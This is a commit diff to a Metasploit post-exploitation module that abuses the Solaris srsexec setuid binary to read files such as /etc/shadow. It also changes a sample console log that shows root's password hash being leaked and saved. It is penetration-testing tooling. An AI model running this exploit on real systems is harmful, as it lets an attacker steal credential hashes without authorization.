print when not verbose
h00die
parent
ff5de7b81d
commit
ee0776b095
|
|
@ -42,21 +42,22 @@
|
|||
msf5 post(solaris/escalate/srsexec_readline) > run
|
||||
|
||||
[+] 3.2.4 is vulnerable
|
||||
[+] Output: verify_binary(wsltw)
|
||||
srsexec: binary_name: wsltw
|
||||
srsexec: name_buf: wsltw_______________
|
||||
[+] Raw Command Output: verify_binary(vFYZf)
|
||||
srsexec: binary_name: vFYZf
|
||||
srsexec: name_buf: vFYZf_______________
|
||||
binaries file line: root:MW7h.vpI1Kq1g:1
|
||||
binaries file line: :17599::::::
|
||||
smmsp:NP
|
||||
Security verification failed for binary: wsltw
|
||||
Security verification failed for binary: vFYZf
|
||||
see SYSLOG(/var/adm/messages) for errors
|
||||
[+] Adding root's hash added to credential database.
|
||||
[+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599::::::
|
||||
[+] Adding root's hash to the credential database.
|
||||
[*] Post module execution completed
|
||||
msf5 post(solaris/escalate/srsexec_readline) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash
|
||||
```
|
||||
|
|
|
|||
|
|
@ -76,8 +76,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
flag = Rex::Text.rand_text_alpha 5
|
||||
output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
|
||||
vprint_good("Output: #{output}")
|
||||
return unless datastore['FILE'] == '/etc/shadow'
|
||||
vprint_good("Raw Command Output: #{output}")
|
||||
|
||||
# The first line of the file is cut at 20 characters.
|
||||
# If the output is longer than 20 characters, then
|
||||
|
|
@ -85,10 +84,14 @@ class MetasploitModule < Msf::Post
|
|||
# followed by the next 18 characters.
|
||||
|
||||
formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map { |line|
|
||||
(line.length == 20) ? line[0..18] : line
|
||||
(line.length == 20) ? line[0..17] : line
|
||||
}.join
|
||||
|
||||
return if formatted_output.empty?
|
||||
|
||||
print_good("First line of #{datastore['FILE']}: #{formatted_output}")
|
||||
|
||||
return unless datastore['FILE'] == '/etc/shadow'
|
||||
print_good("Adding root's hash to the credential database.")
|
||||
credential_data = {
|
||||
origin_type: :session,
|
||||
|
|
|
|||
Loading…
Reference in New Issue